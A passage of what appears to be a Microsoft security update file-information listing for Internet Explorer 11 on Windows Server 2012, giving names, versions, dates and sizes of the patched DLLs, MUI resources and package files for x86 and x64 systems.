\nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:46| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:48| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:50| 1,890,304 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:10| 12,315,136 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:38| 24,486 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 18:45| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:24| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:17| 675,328 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 20:15| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:13| 3,571,712 \njscript9diag.dll| 11.0.9600.20045| 4-Jun-2021| 21:23| 557,568 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:31| 516,096 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:37| 403,968 \n \n### **Windows Server 2012**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nFileinfo.xml| Not Applicable| 20-Aug-21| 0:38| 590,629 \nIe11-windows6.2-kb5005563-x86-express.cab| Not Applicable| 19-Aug-21| 23:14| 726,202 \nIe11-windows6.2-kb5005563-x86.msu| Not Applicable| 19-Aug-21| 22:46| 27,627,035 \nIe11-windows6.2-kb5005563-x86.psf| Not Applicable| 19-Aug-21| 22:59| 184,419,043 \nPackageinfo.xml| Not Applicable| 20-Aug-21| 0:38| 1,133 \nPackagestructure.xml| Not Applicable| 20-Aug-21| 0:38| 149,422 \nPrebvtpackageinfo.xml| Not Applicable| 20-Aug-21| 0:38| 573 \nIe11-windows6.2-kb5005563-x86.cab| Not Applicable| 19-Aug-21| 22:35| 27,497,280 \nIe11-windows6.2-kb5005563-x86.xml| Not Applicable| 19-Aug-21| 22:39| 450 \nWsusscan.cab| Not Applicable| 19-Aug-21| 22:42| 173,732 \nUrlmon.dll| 11.0.9600.20112| 14-Aug-21| 2:19| 1,342,976 \nIexplore.exe| 11.0.9600.20112| 19-Aug-21| 18:56| 810,384 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 46,592 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 56,320 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 57,856 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 47,616 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 49,152 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 55,296 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 45,056 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 39,424 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 35,840 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 53,760 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 53,248 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 51,712 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 50,688 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 50,176 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 30,720 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 30,720 \nInetcpl.cpl| 11.0.9600.20112| 14-Aug-21| 2:35| 2,058,752 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 307,200 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 293,888 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 290,304 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 299,008 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 303,104 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 282,112 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 283,648 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 291,840 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 299,520 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 275,968 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 293,376 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 296,960 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 258,048 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 256,512 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 289,280 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 288,256 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 285,184 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 295,424 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 297,472 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 292,864 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 295,424 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 294,400 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 294,400 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 292,864 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 290,816 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 288,768 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 286,208 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 281,600 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 286,720 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 292,352 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 242,176 \nMshtml.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 243,200 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 46,080 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 51,712 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 54,272 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 47,616 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 50,688 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 45,056 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 39,936 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 39,424 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 47,616 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 51,200 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 50,688 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 50,176 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 49,664 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 48,640 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 49,152 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 48,128 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 35,328 \nUrlmon.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 35,328 \nJsproxy.dll| 11.0.9600.20112| 14-Aug-21| 2:58| 47,104 \nWininet.dll| 11.0.9600.20112| 14-Aug-21| 2:27| 4,387,840 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 114,176 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 130,560 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 124,928 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 122,880 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 130,048 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 138,240 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 114,688 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 131,584 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 117,760 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 122,368 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 134,144 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 107,008 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 123,392 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 127,488 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 128,512 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 88,576 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 82,944 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 125,440 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 123,392 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 120,320 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 130,560 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 125,952 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 128,000 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 129,024 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 124,416 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 121,856 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 115,712 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 123,904 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 125,440 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 72,704 \nInetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 73,728 \nMsfeedsbs.dll| 11.0.9600.20112| 14-Aug-21| 2:42| 52,736 \nMsfeedsbs.mof| Not Applicable| 14-Aug-21| 1:11| 1,574 \nMsfeedssync.exe| 11.0.9600.20112| 14-Aug-21| 3:04| 11,776 \nMicrosoft-windows-ie-htmlrendering.ptxml| Not Applicable| 14-Aug-21| 1:03| 3,228 \nMshtml.dll| 11.0.9600.20112| 14-Aug-21| 3:33| 20,294,144 \nMshtml.tlb| 11.0.9600.20112| 14-Aug-21| 3:13| 2,724,864 \nIeproxy.dll| 11.0.9600.20112| 14-Aug-21| 2:14| 310,784 \nIeshims.dll| 11.0.9600.20112| 14-Aug-21| 2:18| 290,304 \nIertutil.dll| 11.0.9600.20112| 14-Aug-21| 3:07| 2,308,608 \nSqmapi.dll| 6.2.9200.16384| 19-Aug-21| 18:56| 228,256 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 2,066,432 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 2,121,216 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 2,063,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 2,314,240 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 2,390,528 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:58| 2,033,152 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 2,255,872 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 2,061,312 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 2,326,016 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 2,019,840 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 2,071,040 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 2,082,816 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 2,307,584 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 2,170,368 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 2,153,984 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 2,291,712 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 2,283,520 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 2,052,096 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 2,301,952 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 2,093,056 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 2,075,648 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 2,299,392 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 2,094,592 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 2,316,800 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 2,305,536 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 2,278,912 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 2,285,568 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 2,060,288 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 2,315,776 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 2,279,424 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 2,324,992 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 2,098,176 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 1,890,304 \nIeframe.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:20| 1,890,304 \nIeframe.dll| 11.0.9600.20112| 14-Aug-21| 2:47| 13,881,856 \nIeframe.ptxml| Not Applicable| 14-Aug-21| 1:03| 24,486 \nInetres.adml| Not Applicable| 19-Aug-21| 18:57| 463,373 \nInetres.adml| Not Applicable| 19-Aug-21| 18:57| 751,311 \nInetres.adml| Not Applicable| 19-Aug-21| 18:58| 526,343 \nInetres.adml| Not Applicable| 19-Aug-21| 18:59| 499,704 \nInetres.adml| Not Applicable| 19-Aug-21| 18:59| 552,387 \nInetres.adml| Not Applicable| 19-Aug-21| 19:00| 944,608 \nInetres.adml| Not Applicable| 19-Aug-21| 20:58| 457,561 \nInetres.adml| Not Applicable| 19-Aug-21| 19:01| 543,999 \nInetres.adml| Not Applicable| 19-Aug-21| 19:01| 751,450 \nInetres.adml| Not Applicable| 19-Aug-21| 19:02| 526,608 \nInetres.adml| Not Applicable| 19-Aug-21| 19:03| 575,885 \nInetres.adml| Not Applicable| 19-Aug-21| 19:04| 463,373 \nInetres.adml| Not Applicable| 19-Aug-21| 19:04| 751,280 \nInetres.adml| Not Applicable| 19-Aug-21| 19:05| 570,788 \nInetres.adml| Not Applicable| 19-Aug-21| 19:05| 548,169 \nInetres.adml| Not Applicable| 19-Aug-21| 19:06| 639,283 \nInetres.adml| Not Applicable| 19-Aug-21| 19:07| 525,516 \nInetres.adml| Not Applicable| 19-Aug-21| 19:08| 751,436 \nInetres.adml| Not Applicable| 19-Aug-21| 19:08| 751,502 \nInetres.adml| Not Applicable| 19-Aug-21| 19:09| 488,537 \nInetres.adml| Not Applicable| 19-Aug-21| 19:10| 548,544 \nInetres.adml| Not Applicable| 19-Aug-21| 19:10| 559,394 \nInetres.adml| Not Applicable| 19-Aug-21| 19:11| 535,116 \nInetres.adml| Not Applicable| 19-Aug-21| 19:12| 541,503 \nInetres.adml| Not Applicable| 19-Aug-21| 19:12| 751,424 \nInetres.adml| Not Applicable| 19-Aug-21| 19:13| 804,520 \nInetres.adml| Not Applicable| 19-Aug-21| 19:14| 751,417 \nInetres.adml| Not Applicable| 19-Aug-21| 19:14| 751,408 \nInetres.adml| Not Applicable| 19-Aug-21| 19:15| 751,145 \nInetres.adml| Not Applicable| 19-Aug-21| 19:16| 503,958 \nInetres.adml| Not Applicable| 19-Aug-21| 19:16| 751,433 \nInetres.adml| Not Applicable| 19-Aug-21| 19:17| 521,634 \nInetres.adml| Not Applicable| 19-Aug-21| 19:17| 751,363 \nInetres.adml| Not Applicable| 19-Aug-21| 19:18| 420,094 \nInetres.adml| Not Applicable| 19-Aug-21| 19:19| 436,663 \nInetres.admx| Not Applicable| 21-Mar-21| 4:22| 1,678,023 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 29,184 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:57| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:58| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 18:59| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 35,328 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:00| 37,888 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:57| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:01| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:02| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:03| 27,648 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:04| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:05| 33,792 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:06| 23,040 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:07| 22,016 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:08| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:09| 31,232 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 34,304 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:10| 35,840 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:11| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:12| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:13| 34,816 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 33,280 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:14| 32,256 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:15| 32,768 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:16| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 30,720 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:17| 29,696 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:18| 16,384 \nJscript9.dll.mui| 11.0.9600.20112| 19-Aug-21| 19:19| 16,896 \nJscript9.dll| 11.0.9600.20112| 14-Aug-21| 2:52| 4,119,040 \nJscript9diag.dll| 11.0.9600.20112| 14-Aug-21| 2:55| 620,032 \nJscript.dll| 5.8.9600.20112| 14-Aug-21| 2:56| 653,824 \nVbscript.dll| 5.8.9600.20112| 14-Aug-21| 3:04| 498,176 \nPackage.cab| Not Applicable| 19-Aug-21| 22:40| 300,569 \n \n### \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nFileinfo.xml| Not versioned| 20-Aug-21| 1:18| 918,967 \nIe11-windows6.2-kb5005563-x64-express.cab| Not versioned| 19-Aug-21| 23:17| 1,228,067 \nIe11-windows6.2-kb5005563-x64.msu| Not versioned| 19-Aug-21| 22:49| 48,216,838 \nIe11-windows6.2-kb5005563-x64.psf| Not versioned| 19-Aug-21| 23:05| 282,897,531 \nPackageinfo.xml| Not versioned| 20-Aug-21| 1:18| 1,228 \nPackagestructure.xml| Not versioned| 20-Aug-21| 1:18| 239,770 \nPrebvtpackageinfo.xml| Not versioned| 20-Aug-21| 1:18| 652 \nIe11-windows6.2-kb5005563-x64.cab| Not versioned| 19-Aug-21| 22:39| 48,118,529 \nIe11-windows6.2-kb5005563-x64.xml| Not versioned| 19-Aug-21| 22:39| 452 \nWsusscan.cab| Not versioned| 19-Aug-21| 22:44| 175,450 \nUrlmon.dll| 11.0.9600.20112| 14-Aug-21| 2:28| 1,562,624 \nIexplore.exe| 11.0.9600.20112| 19-Aug-21| 20:26| 810,376 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:27| 46,592 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:28| 52,736 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:28| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:29| 51,200 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:30| 56,320 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:30| 57,856 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 21:32| 49,664 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:31| 54,272 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:32| 47,616 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:32| 49,152 \nWininet.dll.mui| 11.0.9600.20112| 19-Aug-21| 20:33| 55,296 